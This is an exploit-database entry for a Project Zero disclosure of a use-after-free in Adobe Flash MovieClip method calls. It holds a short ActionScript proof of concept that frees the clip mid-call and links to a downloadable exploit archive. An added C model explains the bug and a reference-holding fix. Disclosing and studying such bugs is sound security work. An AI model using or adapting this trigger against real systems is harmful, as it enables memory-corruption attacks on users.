Adobe Flash – Method Calls Use-After-Free

  • Author: Google Security Research
    Date: 2016-09-08
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/40356/
  • Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=846
    
    If a method is called on a MovieClip, and a getter is set with the name of the method, the getter is executed during the call and can free the MovieClip, leading to a use-after-free. A minimal PoC is as follows:
    
    var mc = this.createEmptyMovieClip("mc", 1);
    // Install func as both getter and setter for the property named "f"
    mc.addProperty("f", func, func);
    // Calling mc.f runs the getter, which removes mc while the call is still in progress
    mc.f("hello");

    function func() {
        mc.removeMovieClip();
        // Fix heap
        var d:Date = new Date();
        return d.getDate;
    }
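    As an added illustration (not Flash's code and not part of the original report), the C model below shows the dispatch pattern behind this bug class and the usual mitigation: hold a reference to the object across any scripted getter and re-check it before using it. `Clip`, `call_method`, `getter_fn` and `g_live_clips` are constructed names.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model (not Flash's code) of the bug class above: reading "f"
 * runs a scripted getter before the method body, and that getter may drop
 * the display list's reference to the MovieClip the method is about to use. */
static int g_live_clips = 0;                 /* Clip objects not yet freed */
/* attached becomes 0 once removeMovieClip() has been modelled on the clip */
typedef struct Clip { int refcount, attached; char name[16]; } Clip;
static Clip *clip_new(const char *name) {
    Clip *c = calloc(1, sizeof *c);
    c->refcount = 1;                         /* the display list's reference */
    c->attached = 1;
    strncpy(c->name, name, sizeof c->name - 1);
    g_live_clips++;
    return c;
}
static void clip_retain(Clip *c)  { c->refcount++; }
static void clip_release(Clip *c) { if (--c->refcount == 0) { g_live_clips--; free(c); } }
typedef void (*getter_fn)(Clip *self);
/* Getter equivalent to func() in the PoC: removes the clip during the lookup. */
static void getter_remove_clip(Clip *self) { self->attached = 0; clip_release(self); }
static void getter_noop(Clip *self) { (void)self; }   /* benign getter */

/* Hardened dispatch: hold our own reference across the getter so the object
 * cannot be freed under us, then re-check it is still attached before running
 * the method. Returns 0 if the method ran, -1 if the getter removed the clip. */
static int call_method(Clip *mc, getter_fn getter, const char *arg) {
    int rc = -1;
    clip_retain(mc);                         /* strong ref for the whole call */
    getter(mc);                              /* script runs here, may remove the clip */
    if (mc->attached) {
        printf("%s.f(\"%s\")\n", mc->name, arg);   /* the method body */
        rc = 0;
    }
    clip_release(mc);                        /* last use was above, so freeing is safe */
    return rc;
}

/* Runs both scenarios; returns 1 when both behave as expected. */
static int demo(void) {
    Clip *a = clip_new("mc");
    int ok = call_method(a, getter_noop, "hello") == 0 && a->refcount == 1;
    clip_release(a);
    Clip *b = clip_new("mc");
    ok = ok && call_method(b, getter_remove_clip, "hello") == -1 && g_live_clips == 0;
    return ok;
}
```

    Without the retain/re-check pair in call_method, the second scenario would run the method body on memory the getter had already freed.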
    
    
    Proof of Concept:
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40356.zip